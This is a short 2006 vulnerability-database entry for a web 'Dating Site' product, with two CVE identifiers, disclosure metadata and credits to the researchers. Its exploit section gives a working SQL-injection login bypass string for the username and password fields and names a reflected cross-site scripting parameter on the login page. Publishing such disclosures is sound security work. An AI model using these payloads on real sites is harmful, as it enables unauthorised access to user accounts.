Dating Site [login bypass & xss]

Vulnerability ID: 1053095
Vulnerability type:
Published: 2006-11-25
Updated: 2006-11-25
CVE ID: CVE-2006-6022, CVE-2006-6021
CNNVD-ID: N/A
Platform: N/A
CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2006110101
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit (EXP)
vendor site:http://www.hotwebapp.com/
product:Dating Site
bug:injection sql & xss
risk:high

log in with :
username = ' or '1' = '1
passwd = ' or '1' = '1

xss get :
/login_form.asp?msg=[xss here]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com